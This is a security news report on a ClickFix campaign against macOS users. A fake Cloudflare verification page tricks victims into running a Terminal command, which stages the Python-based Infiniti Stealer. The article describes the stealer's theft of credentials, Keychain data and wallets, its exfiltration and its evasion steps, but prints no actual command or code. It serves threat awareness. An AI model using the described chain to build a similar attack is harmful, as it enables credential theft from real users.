macOS users are targeted in a fresh ClickFix campaign that uses a Cloudflare-themed verification page to deliver a Python-based information stealer, Malwarebytes reports.
The attack starts with a fake CAPTCHA page that serves a legitimate-looking Cloudflare human verification page asking visitors to paste and execute a command in Terminal.
Referred to as ClickFix, the technique relies on social engineering to trick users into executing malicious commands on their devices and has been widely used in attacks since August 2024, mainly against Windows users.
For more than half a year, however, attacks tailored for macOS have become increasingly convincing, and the variant observed by Malwarebytes is no different.
The fake verification page provides macOS users with specific instructions to open the Terminal and paste and execute a fake verification command that triggers malware execution.
Once the victim runs the command, a Bash script is fetched from a remote server. The script decodes an embedded payload, writes the second stage binary to a temporary folder, removes its quarantine flag, and executes it.
The script also passes command-and-control (C&C) server and authentication tokens as environment variables, deletes itself, and closes the Terminal.
The binary dropped by the script is a loader compiled using Nuitka. The compiler transforms Python code into a native binary, making static analysis more difficult.
At runtime, the loader decompresses embedded data and launches the final payload, identified as the Infiniti Stealer malware.
The Python-based information stealer targets browser credentials, Keychain information, cryptocurrency wallets, secrets stored in developer files, and screenshots captured during execution.
The data is sent to the C&C via HTTP POST requests. Once the operation has been completed, the malware sends a notification to a Telegram channel and queues captured credentials to be cracked on the server.
For evasion, Infiniti Stealer relies on randomized execution delay and checks if the system is a known analysis environment.
“Infiniti Stealer shows how techniques that worked on Windows—like ClickFix—are now being adapted to target Mac users. It also uses newer techniques, like compiling Python into native apps, which makes the malware harder to detect and analyze. If this approach proves effective, we may see more attacks like this,” Malwarebytes notes.
Related: Over 100 GitHub Repositories Distributing BoryptGrab Stealer
Related: ‘SolyxImmortal’ Information Stealer Emerges
Related: North Korean Hackers Target macOS Developers via Malicious VS Code Projects
Related: MacSync macOS Malware Distributed via Signed Swift Application
